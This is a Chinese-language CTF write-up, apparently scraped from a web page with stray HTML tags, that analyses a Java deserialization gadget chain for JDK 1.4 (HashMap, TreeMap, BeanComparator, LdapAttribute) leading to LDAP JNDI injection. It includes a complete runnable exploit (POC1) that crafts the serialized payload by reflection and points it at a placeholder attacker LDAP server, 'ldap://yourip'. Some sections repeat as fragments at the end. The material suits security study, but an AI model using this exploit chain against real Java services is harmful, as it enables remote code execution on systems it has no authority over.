JDK 1.4环境下利用CommonsBeanutils和JNDI注入的反序列化漏洞分析<\/h1>

0x00 漏洞背景与题目分析<\/h2>
本漏洞分析基于RealWorld CTF中的一道题目，主要考察在JDK 1.4环境下Gadget链的挖掘和利用。题目提供了一个包含CommonsBeanutils库的环境，但运行在JDK 1.4上，这带来了特殊的挑战。<\/p>

环境限制<\/h3>
JDK版本：1.4<\/li>
缺少的关键类：
PriorityQueue<\/code>（反序列化入口点）<\/li>
TemplatesImpl<\/code>（RCE执行点）<\/li>
<\/ul>
<\/li>
<\/ul>
传统Gadget链失效<\/h3>
在标准环境下，CommonsBeanutils的利用链通常为：<\/p>
PriorityQueue.readObject() -> BeanComparator.compare() -> TemplatesImpl.getOutputProperties() -> RCE
<\/code><\/pre>
但在JDK 1.4环境下，这条链的两个关键节点都不可用。<\/p>
0x01 新的Gadget链构建思路<\/h2>
剩余可用部分<\/h3>
BeanComparator.compare() -> 执行getter
<\/code><\/pre>
新链构建目标<\/h3>

寻找新的反序列化入口点（替代PriorityQueue）<\/li>
寻找新的RCE执行点（替代TemplatesImpl）<\/li>
<\/ol>
0x02 新的反序列化入口链<\/h2>
完整调用链<\/h3>
HashMap.readObject() -> HashMap.putForCreate() -> AbstractMap.equals() -> TreeMap.get() -> TreeMap.getEntry() -> BeanComparator.compare()
<\/code><\/pre>
关键代码分析<\/h3>
private<\/span> void<\/span> putForCreate<\/span>(<\/span>K var1,<\/span> V var2)<\/span> {<\/span>
<\/span><\/span>    int<\/span> var3 =<\/span> var1 ==<\/span> null<\/span> ?<\/span> 0<\/span> :<\/span> hash(<\/span>var1.<\/span>hashCode<\/span>());<\/span>
<\/span><\/span>    int<\/span> var4 =<\/span> indexFor(<\/span>var3,<\/span> this<\/span>.<\/span>table<\/span>.<\/span>length<\/span>);<\/span>
<\/span><\/span>    for<\/span> (<\/span>HashMap.<\/span>Entry<\/span> var5 =<\/span> this<\/span>.<\/span>table<\/span>[<\/span>var4];<\/span> var5 !=<\/span> null<\/span>;<\/span> var5 =<\/span> var5.<\/span>next<\/span>)<\/span> {<\/span>
<\/span><\/span>        Object var6;<\/span>
<\/span><\/span>        if<\/span> (<\/span>var5.<\/span>hash<\/span> ==<\/span> var3 &&<\/span> ((<\/span>var6 =<\/span> var5.<\/span>key<\/span>)<\/span> ==<\/span> var1 ||<\/span> var1 !=<\/span> null<\/span> &&<\/span> var1.<\/span>equals<\/span>(<\/span>var6)))<\/span> {<\/span>
<\/span><\/span>            var5.<\/span>value<\/span> =<\/span> var2;<\/span>
<\/span><\/span>            return<\/span>;<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>触发原理<\/h3>

HashMap反序列化时会调用putForCreate<\/code>方法<\/li>
该方法会检查key是否已存在，通过调用key的equals()<\/code>方法<\/li>
使用TreeMap<\/code>作为key，其equals()<\/code>方法会调用get()<\/code>方法<\/li>
TreeMap.get()<\/code>最终会调用BeanComparator.compare()<\/code><\/li>
<\/ol>
0x03 新的RCE执行点 - JNDI注入<\/h2>
关键发现<\/h3>
com.sun.jndi.ldap.LdapAttribute<\/code>类的getAttributeDefinition()<\/code>方法存在LDAP-JNDI注入漏洞<\/p>
漏洞代码<\/h3>
public<\/span> DirContext getAttributeDefinition<\/span>()<\/span> throws<\/span> NamingException {<\/span>
<\/span><\/span>    DirContext var1 =<\/span> this<\/span>.<\/span>getBaseCtx<\/span>().<\/span>getSchema<\/span>(<\/span>this<\/span>.<\/span>rdn<\/span>);<\/span>
<\/span><\/span>    return<\/span> (<\/span>DirContext)<\/span>var1.<\/span>lookup<\/span>(<\/span>"AttributeDefinition\/"<\/span> +<\/span> this<\/span>.<\/span>getID<\/span>());<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>调用栈分析<\/h3>
c_lookup:982, LdapCtx (com.sun.jndi.ldap)
c_resolveIntermediate_nns:152, ComponentContext (com.sun.jndi.toolkit.ctx)
c_resolveIntermediate_nns:342, AtomicContext (com.sun.jndi.toolkit.ctx)
p_resolveIntermediate:381, ComponentContext (com.sun.jndi.toolkit.ctx)
p_getSchema:408, ComponentDirContext (com.sun.jndi.toolkit.ctx)
getSchema:388, PartialCompositeDirContext (com.sun.jndi.toolkit.ctx)
getSchema:189, InitialDirContext (javax.naming.directory)
getAttributeDefinition:191, LdapAttribute (com.sun.jndi.ldap)
<\/code><\/pre>
LDAP-JNDI注入根因<\/h3>
除了常见的InitialContext.lookup()<\/code>，以下方法也可触发JNDI注入：<\/p>

LdapCtx.c_lookup()<\/code><\/li>
ComponentContext.p_lookup()<\/code><\/li>
PartialCompositeContext.lookup()<\/code><\/li>
GenericURLContext.lookup()<\/code><\/li>
ldapURLContext.lookup()<\/code><\/li>
<\/ul>
0x04 EXP构造详解<\/h2>
完整利用链<\/h3>
反序列化 -> HashMap.putForCreate() -> TreeMap.equals() -> TreeMap.get() -> BeanComparator.compare() -> LdapAttribute.getAttributeDefinition() -> JNDI注入
<\/code><\/pre>
关键构造步骤<\/h3>

创建LdapAttribute对象<\/strong>：<\/li>
<\/ol>
BasicAttribute la =<\/span> getGadgetObj();<\/span>
<\/span><\/span><\/code><\/pre>
设置比较器<\/strong>：<\/li>
<\/ol>
BeanComparator bc =<\/span> new<\/span> BeanComparator(<\/span>"attributeDefinition"<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>
构造触发对象<\/strong>：<\/li>
<\/ol>
HashMap hm =<\/span> new<\/span> HashMap();<\/span>
<\/span><\/span>TreeMap tm1 =<\/span> new<\/span> TreeMap(<\/span>bc);<\/span>
<\/span><\/span>TreeMap tm2 =<\/span> new<\/span> TreeMap(<\/span>bc);<\/span>
<\/span><\/span>tm1.<\/span>put<\/span>(<\/span>"aaa"<\/span>,<\/span> "AAA"<\/span>);<\/span>
<\/span><\/span>tm2.<\/span>put<\/span>(<\/span>la,<\/span> "BBB"<\/span>);<\/span>
<\/span><\/span>hm.<\/span>put<\/span>(<\/span>tm1,<\/span> "111"<\/span>);<\/span>
<\/span><\/span>hm.<\/span>put<\/span>(<\/span>tm2,<\/span> "222"<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>
修复HashMap结构<\/strong>（确保触发equals比较）：<\/li>
<\/ol>
\/\/ 通过反射修改HashMap内部结构，确保两个TreeMap会被比较
<\/span><\/span><\/span><\/span>Field fi =<\/span> hm.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"table"<\/span>);<\/span>
<\/span><\/span>fi.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>Map.<\/span>Entry<\/span>[]<\/span> hmentry =<\/span> (<\/span>Map.<\/span>Entry<\/span>[])<\/span> fi.<\/span>get<\/span>(<\/span>hm);<\/span>
<\/span><\/span>\/\/ ... 其他反射操作 ...
<\/span><\/span><\/span><\/code><\/pre>LdapAttribute对象构造方法<\/h3>
public<\/span> static<\/span> BasicAttribute getGadgetObj<\/span>(){<\/span>
<\/span><\/span>    try<\/span> {<\/span>
<\/span><\/span>        Class clazz =<\/span> Class.<\/span>forName<\/span>(<\/span>"com.sun.jndi.ldap.LdapAttribute"<\/span>);<\/span>
<\/span><\/span>        Constructor clazz_cons =<\/span> clazz.<\/span>getDeclaredConstructor<\/span>(<\/span>new<\/span> Class[]{<\/span>String.<\/span>class<\/span>});<\/span>
<\/span><\/span>        clazz_cons.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        BasicAttribute la =<\/span> (<\/span>BasicAttribute)<\/span>clazz_cons.<\/span>newInstance<\/span>(<\/span>new<\/span> Object[]{<\/span>"exp"<\/span>});<\/span>
<\/span><\/span>        
<\/span><\/span>        Field bcu_fi =<\/span> clazz.<\/span>getDeclaredField<\/span>(<\/span>"baseCtxURL"<\/span>);<\/span>
<\/span><\/span>        bcu_fi.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        bcu_fi.<\/span>set<\/span>(<\/span>la,<\/span> "ldap:\/\/yourip"<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        CompositeName cn =<\/span> new<\/span> CompositeName();<\/span>
<\/span><\/span>        cn.<\/span>add<\/span>(<\/span>"a"<\/span>);<\/span>
<\/span><\/span>        cn.<\/span>add<\/span>(<\/span>"b"<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        Field rdn_fi =<\/span> clazz.<\/span>getDeclaredField<\/span>(<\/span>"rdn"<\/span>);<\/span>
<\/span><\/span>        rdn_fi.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        rdn_fi.<\/span>set<\/span>(<\/span>la,<\/span> cn);<\/span>
<\/span><\/span>        
<\/span><\/span>        return<\/span> la;<\/span>
<\/span><\/span>    }<\/span> catch<\/span> (<\/span>Exception e){<\/span>
<\/span><\/span>        e.<\/span>printStackTrace<\/span>();<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    return<\/span> null<\/span>;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>0x05 技术要点总结<\/h2>


JDK 1.4环境限制<\/strong>：<\/p>

缺少常用Gadget类，需要寻找替代方案<\/li>
反序列化入口点需要重新设计<\/li>
<\/ul>
<\/li>

关键发现<\/strong>：<\/p>

LdapAttribute.getAttributeDefinition()<\/code>可作为新的RCE触发点<\/li>
JNDI注入不仅限于InitialContext.lookup()<\/code><\/li>
<\/ul>
<\/li>

构造技巧<\/strong>：<\/p>

利用HashMap反序列化特性触发比较操作<\/li>
通过TreeMap的equals\/get方法桥接到BeanComparator<\/li>
反射修改内部结构确保触发路径<\/li>
<\/ul>
<\/li>

防御建议<\/strong>：<\/p>

升级JDK版本<\/li>
限制反序列化操作<\/li>
过滤危险的JNDI操作<\/li>
<\/ul>
<\/li>
<\/ol>
0x06 完整EXP代码<\/h2>
import<\/span> org.apache.commons.beanutils.BeanComparator;<\/span>
<\/span><\/span>import<\/span> javax.naming.CompositeName;<\/span>
<\/span><\/span>import<\/span> javax.naming.directory.BasicAttribute;<\/span>
<\/span><\/span>import<\/span> javax.naming.directory.DirContext;<\/span>
<\/span><\/span>import<\/span> java.io.ByteArrayInputStream;<\/span>
<\/span><\/span>import<\/span> java.io.ByteArrayOutputStream;<\/span>
<\/span><\/span>import<\/span> java.io.ObjectInputStream;<\/span>
<\/span><\/span>import<\/span> java.io.ObjectOutputStream;<\/span>
<\/span><\/span>import<\/span> java.lang.reflect.Constructor;<\/span>
<\/span><\/span>import<\/span> java.lang.reflect.Field;<\/span>
<\/span><\/span>import<\/span> java.lang.reflect.Method;<\/span>
<\/span><\/span>import<\/span> java.lang.reflect.Modifier;<\/span>
<\/span><\/span>import<\/span> java.util.HashMap;<\/span>
<\/span><\/span>import<\/span> java.util.Map;<\/span>
<\/span><\/span>import<\/span> java.util.TreeMap;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> POC1<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> {<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            BasicAttribute la =<\/span> getGadgetObj();<\/span>
<\/span><\/span>            BeanComparator bc =<\/span> new<\/span> BeanComparator(<\/span>"attributeDefinition"<\/span>);<\/span>
<\/span><\/span>            
<\/span><\/span>            HashMap hm =<\/span> new<\/span> HashMap();<\/span>
<\/span><\/span>            TreeMap tm1 =<\/span> new<\/span> TreeMap(<\/span>bc);<\/span>
<\/span><\/span>            TreeMap tm2 =<\/span> new<\/span> TreeMap(<\/span>bc);<\/span>
<\/span><\/span>            
<\/span><\/span>            tm1.<\/span>put<\/span>(<\/span>"aaa"<\/span>,<\/span> "AAA"<\/span>);<\/span>
<\/span><\/span>            tm2.<\/span>put<\/span>(<\/span>la,<\/span> "BBB"<\/span>);<\/span>
<\/span><\/span>            
<\/span><\/span>            hm.<\/span>put<\/span>(<\/span>tm1,<\/span> "111"<\/span>);<\/span>
<\/span><\/span>            hm.<\/span>put<\/span>(<\/span>tm2,<\/span> "222"<\/span>);<\/span>
<\/span><\/span>            
<\/span><\/span>            \/\/ 反射修改HashMap内部结构确保触发
<\/span><\/span><\/span><\/span>            Field fi =<\/span> hm.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"table"<\/span>);<\/span>
<\/span><\/span>            fi.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>            Map.<\/span>Entry<\/span>[]<\/span> hmentry =<\/span> (<\/span>Map.<\/span>Entry<\/span>[])<\/span> fi.<\/span>get<\/span>(<\/span>hm);<\/span>
<\/span><\/span>            int<\/span> tablelength =<\/span> hmentry.<\/span>length<\/span>;<\/span>
<\/span><\/span>            
<\/span><\/span>            tm1.<\/span>hashCode<\/span>();<\/span>
<\/span><\/span>            Method hash_mt =<\/span> hm.<\/span>getClass<\/span>().<\/span>getDeclaredMethod<\/span>(<\/span>"hash"<\/span>,<\/span> new<\/span> Class[]{<\/span>Object.<\/span>class<\/span>});<\/span>
<\/span><\/span>            hash_mt.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>            Object indexfor_arg1 =<\/span> hash_mt.<\/span>invoke<\/span>(<\/span>hm,<\/span> new<\/span> Object[]{(<\/span>Object)(<\/span>new<\/span> Integer(<\/span>tm1.<\/span>hashCode<\/span>()))});<\/span>
<\/span><\/span>            
<\/span><\/span>            Method indexfor_mt =<\/span> hm.<\/span>getClass<\/span>().<\/span>getDeclaredMethod<\/span>(<\/span>"indexFor"<\/span>,<\/span> new<\/span> Class[]{<\/span>int<\/span>.<\/span>class<\/span>,<\/span> int<\/span>.<\/span>class<\/span>});<\/span>
<\/span><\/span>            indexfor_mt.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>            int<\/span> final_index =<\/span> Integer.<\/span>parseInt<\/span>(<\/span>indexfor_mt.<\/span>invoke<\/span>(<\/span>hm,<\/span> new<\/span> Object[]{<\/span>new<\/span> Integer(<\/span>indexfor_arg1.<\/span>toString<\/span>()),<\/span> new<\/span> Integer(<\/span>tablelength)}).<\/span>toString<\/span>());<\/span>
<\/span><\/span>            
<\/span><\/span>            Map.<\/span>Entry<\/span> me =<\/span> ((<\/span>Map.<\/span>Entry<\/span>[])<\/span>hmentry)[<\/span>final_index];<\/span>
<\/span><\/span>            Class entryclazz =<\/span> Class.<\/span>forName<\/span>(<\/span>"java.util.HashMap$Entry"<\/span>);<\/span>
<\/span><\/span>            Field key_fi =<\/span> entryclazz.<\/span>getDeclaredField<\/span>(<\/span>"key"<\/span>);<\/span>
<\/span><\/span>            key_fi.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>            
<\/span><\/span>            Field modifierField =<\/span> Field.<\/span>class<\/span>.<\/span>getDeclaredField<\/span>(<\/span>"modifiers"<\/span>);<\/span>
<\/span><\/span>            modifierField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>            modifierField.<\/span>setInt<\/span>(<\/span>key_fi,<\/span> key_fi.<\/span>getModifiers<\/span>()<\/span> &<\/span> ~<\/span>Modifier.<\/span>FINAL<\/span>);<\/span>
<\/span><\/span>            
<\/span><\/span>            key_fi.<\/span>set<\/span>(<\/span>me,<\/span> tm2.<\/span>clone<\/span>());<\/span>
<\/span><\/span>            
<\/span><\/span>            \/\/ 序列化触发
<\/span><\/span><\/span><\/span>            ByteArrayOutputStream baos =<\/span> new<\/span> ByteArrayOutputStream();<\/span>
<\/span><\/span>            ObjectOutputStream oos =<\/span> new<\/span> ObjectOutputStream(<\/span>baos);<\/span>
<\/span><\/span>            oos.<\/span>writeObject<\/span>(<\/span>hm);<\/span>
<\/span><\/span>            
<\/span><\/span>            \/\/ 反序列化触发漏洞
<\/span><\/span><\/span><\/span>            ByteArrayInputStream bais =<\/span> new<\/span> ByteArrayInputStream(<\/span>baos.<\/span>toByteArray<\/span>());<\/span>
<\/span><\/span>            ObjectInputStream ois =<\/span> new<\/span> ObjectInputStream(<\/span>bais);<\/span>
<\/span><\/span>            HashMap hmhm =<\/span> (<\/span>HashMap)<\/span> ois.<\/span>readObject<\/span>();<\/span>
<\/span><\/span>            
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>Exception e){<\/span>
<\/span><\/span>            e.<\/span>printStackTrace<\/span>();<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    public<\/span> static<\/span> BasicAttribute getGadgetObj<\/span>(){<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            Class clazz =<\/span> Class.<\/span>forName<\/span>(<\/span>"com.sun.jndi.ldap.LdapAttribute"<\/span>);<\/span>
<\/span><\/span>            Constructor clazz_cons =<\/span> clazz.<\/span>getDeclaredConstructor<\/span>(<\/span>new<\/span> Class[]{<\/span>String.<\/span>class<\/span>});<\/span>
<\/span><\/span>            clazz_cons.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>            BasicAttribute la =<\/span> (<\/span>BasicAttribute)<\/span>clazz_cons.<\/span>newInstance<\/span>(<\/span>new<\/span> Object[]{<\/span>"exp"<\/span>});<\/span>
<\/span><\/span>            
<\/span><\/span>            Field bcu_fi =<\/span> clazz.<\/span>getDeclaredField<\/span>(<\/span>"baseCtxURL"<\/span>);<\/span>
<\/span><\/span>            bcu_fi.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>            bcu_fi.<\/span>set<\/span>(<\/span>la,<\/span> "ldap:\/\/yourip"<\/span>);<\/span>
<\/span><\/span>            
<\/span><\/span>            CompositeName cn =<\/span> new<\/span> CompositeName();<\/span>
<\/span><\/span>            cn.<\/span>add<\/span>(<\/span>"a"<\/span>);<\/span>
<\/span><\/span>            cn.<\/span>add<\/span>(<\/span>"b"<\/span>);<\/span>
<\/span><\/span>            
<\/span><\/span>            Field rdn_fi =<\/span> clazz.<\/span>getDeclaredField<\/span>(<\/span>"rdn"<\/span>);<\/span>
<\/span><\/span>            rdn_fi.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>            rdn_fi.<\/span>set<\/span>(<\/span>la,<\/span> cn);<\/span>
<\/span><\/span>            
<\/span><\/span>            return<\/span> la;<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>Exception e){<\/span>
<\/span><\/span>            e.<\/span>printStackTrace<\/span>();<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>        return<\/span> null<\/span>;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>0x07 总结<\/h2>
本漏洞展示了在受限环境（JDK 1.4）下如何通过深入分析JDK内部类和反序列化机制，构建出新的利用链。关键在于：<\/p>

理解反序列化触发流程<\/li>
寻找替代的JNDI注入点<\/li>
巧妙利用集合类的内部比较机制<\/li>
通过反射精确控制对象内部状态<\/li>
<\/ol>
这种漏洞利用方式具有很高的技术价值，同时也提醒开发者在安全开发中需要考虑各种环境下的潜在风险。<\/p>
JDK 1.4环境下利用CommonsBeanutils和JNDI注入的反序列化漏洞分析<\/h1>

0x00 漏洞背景与题目分析<\/h2> 本漏洞分析基于RealWorld CTF中的一道题目，主要考察在JDK 1.4环境下Gadget链的挖掘和利用。题目提供了一个包含CommonsBeanutils库的环境，但运行在JDK 1.4上，这带来了特殊的挑战。<\/p>

0x01 新的Gadget链构建思路<\/h2>

0x02 新的反序列化入口链<\/h2>

0x03 新的RCE执行点 - JNDI注入<\/h2>

关键发现<\/h3> com.sun.jndi.ldap.LdapAttribute<\/code>类的getAttributeDefinition()<\/code>方法存在LDAP-JNDI注入漏洞<\/p>

0x04 EXP构造详解<\/h2>

0x00 漏洞背景与题目分析<\/h2>
本漏洞分析基于RealWorld CTF中的一道题目，主要考察在JDK 1.4环境下Gadget链的挖掘和利用。题目提供了一个包含CommonsBeanutils库的环境，但运行在JDK 1.4上，这带来了特殊的挑战。<\/p>

关键发现<\/h3>
`com.sun.jndi.ldap.LdapAttribute<\/code>类的getAttributeDefinition()<\/code>方法存在LDAP-JNDI注入漏洞<\/p>`
